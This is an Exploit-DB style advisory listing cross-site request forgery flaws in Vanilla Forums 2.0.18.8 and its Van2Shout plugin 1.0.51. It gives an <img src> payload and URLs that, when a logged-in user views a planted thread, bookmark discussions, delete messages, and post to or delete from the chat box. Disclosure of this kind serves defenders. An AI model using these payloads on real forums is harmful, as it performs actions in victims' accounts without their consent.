Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple Cross-Site Request Forgery Vulnerabilities

EDB-ID:

24957

CVE:





Platform:

PHP

Date:

2013-04-15


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title:
Vanilla Forums <= 2.0.18.8 & Van2Shout 1.0.51 Multiple CSRF

# Google Dork: n/a
# Date: 13/4/13
# Exploit Author: Henry Hoggard
# Vendor Homepage: [http://vanillaforums.org/ ,
http://vanillaforums.org/addon/van2shout-plugin]
# Software Link: [http://vanillaforums.org/download,
http://vanillaforums.org/get/van2shout-plugin-1.051]
# Version: [2.0.18.8 , 1.0.51]
# Tested on: [Debian]
# CVE :

=======================

You can exploit these by having the user visit a thread with the img src
of the below urls.

eg <img
src="http://site.org/index.php=/vanilla/discussion/bookmark/1337?> where
1337 is the id.

 

Bookmark CSRF:

http://site.org/index.php=/vanilla/discussion/bookmark/1337

UnBookmark CSRF

http://site.org/index.php=/vanilla/discussion/bookmark/1337?

Delete Message CSRF

http://site.org/index.php=/messages/clear/1337

Post to Van2Shout Chat Box CSRF

http://site.org/index.php?p=/plugin/Van2ShoutData&newpost=testmessage

Delete Message from Van2Shout Chatbox CSRF

http://site.org/index.php?p=/plugin/Van2ShoutData&del=1337